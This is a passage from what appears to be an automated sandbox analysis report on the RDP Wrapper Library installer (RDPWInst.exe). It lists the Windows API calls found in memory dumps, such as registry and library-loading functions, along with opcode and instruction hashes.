                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Open
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                        • Opcode ID: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                                                                                        • Instruction ID: 3681a8d3f24b20706dc106850b3bb9ce640454c4e8124a7cc358b0d46e7adf70
                                                                                                                                                        • Opcode Fuzzy Hash: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                                                                                        • Instruction Fuzzy Hash: 1F51A370B00344AFDB11EBA5C842B9EF7F9AB48304F11547EB444A3282CA7DAF069759
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                                                                        • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                                                                        • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                                                          • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                                                          • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                                                          • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                                                          • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3490077880-0
                                                                                                                                                        • Opcode ID: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                                                                                        • Instruction ID: 823ae625d887489e04d5fb836baef855571e76b59bd7737af2fa314308855dda
                                                                                                                                                        • Opcode Fuzzy Hash: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                                                                                        • Instruction Fuzzy Hash: 0D316F749002508BEF21BF69988975737A0AB05319F1640BFE806AB2D7C77C9CA4CB9D
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                                                                        • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                                                                        • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                                                          • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                                                          • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                                                          • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                                                          • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3490077880-0
                                                                                                                                                        • Opcode ID: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                                                                                        • Instruction ID: 46b61aa2349ed196f7bea0abd1f985a96ea7bcfce35a4251490327c9ac1ca2fd
                                                                                                                                                        • Opcode Fuzzy Hash: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                                                                                        • Instruction Fuzzy Hash: 1331A2749002908BDF21BF78888975737A0AB06319F1640BFE845AB2D7C37C9CA4CB9D
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                                                                        • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                                                                        • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                                                          • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                                                          • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                                                          • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                                                          • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3490077880-0
                                                                                                                                                        • Opcode ID: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                                                                                        • Instruction ID: d971c45546d1ba4d910c131f5b4d15d6df32f901540fb653785064192c66a389
                                                                                                                                                        • Opcode Fuzzy Hash: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                                                                                        • Instruction Fuzzy Hash: 712191749002508BDF21BF79988975737A0AB06319F1640BFE806AB2C7C37C9CA4CB9D
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00402F9F,?,00402C72), ref: 004029A6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID: $zD$$zD
                                                                                                                                                        • API String ID: 4275171209-354537599
                                                                                                                                                        • Opcode ID: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                                                                                        • Instruction ID: 5217acd6ab2d11c2bd36ab0357f96252e91eb64f60a530f80fec48377855cdbd
                                                                                                                                                        • Opcode Fuzzy Hash: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                                                                                        • Instruction Fuzzy Hash: 8AF062F1B143004FDB45CF799D853157AD1A78A318F20807EE608EB7E8EBB484468B48
                                                                                                                                                        APIs
                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004068D2
                                                                                                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 004069DF
                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004069F1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Free$Alloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 986138563-0
                                                                                                                                                        • Opcode ID: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                                                                                        • Instruction ID: fb71732fc0ca27c4a1f64b9cddcd98791c7700d24e5edf769cc3926ad45b99af
                                                                                                                                                        • Opcode Fuzzy Hash: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                                                                                        • Instruction Fuzzy Hash: D6E08CB91022017DEA002F228D14B3B3368AF82311B6980BFB401BA2D1D67C88419A3C
                                                                                                                                                        APIs
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 0043991B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                        • String ID: ImagePath
                                                                                                                                                        • API String ID: 3660427363-1008103227
                                                                                                                                                        • Opcode ID: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                                                                                        • Instruction ID: d4c3dc3867a5d7f93f9a48779984ca1be9368a485682844844f209d8ad6df9e6
                                                                                                                                                        • Opcode Fuzzy Hash: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                                                                                        • Instruction Fuzzy Hash: C0019E76604208AFDB00EFA9CC81EDFB7A8EB49314F00817AB954D7342DA749E048BA5
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Open
                                                                                                                                                        • String ID: $sD
                                                                                                                                                        • API String ID: 71445658-3047594130
                                                                                                                                                        • Opcode ID: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                                                                                        • Instruction ID: 93af5e93b009f9dfb1ca8860ce5652d254f583336edc44d6a4486ea6cd266cab
                                                                                                                                                        • Opcode Fuzzy Hash: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                                                                                        • Instruction Fuzzy Hash: 19017571B04208AFD714EB65CC52A9EB3FCEB4C304F61457BF445E3281DA79EE149658
                                                                                                                                                        APIs
                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,ServiceDll,?,?), ref: 004398AE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Value
                                                                                                                                                        • String ID: ServiceDll
                                                                                                                                                        • API String ID: 3702945584-3252591312
                                                                                                                                                        • Opcode ID: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                                                                                        • Instruction ID: 396de0d2a0ab042baed8acc32e75219307ae4a3dd24f7b0442dd3090ee3af4a1
                                                                                                                                                        • Opcode Fuzzy Hash: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                                                                                        • Instruction Fuzzy Hash: 74018671A042086FD750EBAEDC81A9FBBEC9F49324F00806AF958E7382D9799D049765
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004399A0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00439D81,?,00447324), ref: 00439D5F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseOpen
                                                                                                                                                        • String ID: $sD
                                                                                                                                                        • API String ID: 47109696-3047594130
                                                                                                                                                        • Opcode ID: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                                                                                        • Instruction ID: e2b80e318971c5615629c962b670a86c0d36aae3c059df6a015560dc8872c8c4
                                                                                                                                                        • Opcode Fuzzy Hash: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                                                                                        • Instruction Fuzzy Hash: F9013171E14304EFDB05CFA9C892A5DB7F8EB4D310F6140B6E810A7351D675EE10DA54
                                                                                                                                                        APIs
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,004392B4,?,?,ImagePath,00000000,004392B4), ref: 0043927D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                        • String ID: ImagePath
                                                                                                                                                        • API String ID: 3660427363-1008103227
                                                                                                                                                        • Opcode ID: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                                                                                        • Instruction ID: 752c998736a6c6af0e84b74aa330b189edc71255cbbe141243c37e1b481e64ab
                                                                                                                                                        • Opcode Fuzzy Hash: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                                                                                        • Instruction Fuzzy Hash: 90F01CA23042406FD744EA6E9C81F6B96DCDBCC714F14443EB288C7282D968CC098769
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A52
                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A8C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 436179556-0
                                                                                                                                                        • Opcode ID: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                                                                                        • Instruction ID: 0ee4ecbf886d923d9c7bbf31fd477b4cbe2ff9aaa7d825c43a2ca86d525438e5
                                                                                                                                                        • Opcode Fuzzy Hash: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                                                                                        • Instruction Fuzzy Hash: E3315C70B04348AFDB11EBA98842B9EF7F9AB48304F50447EB544E7282DA78AF059759
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                                                                                          • Part of subcall function 0040941C: lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                                                                                          • Part of subcall function 0040941C: lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
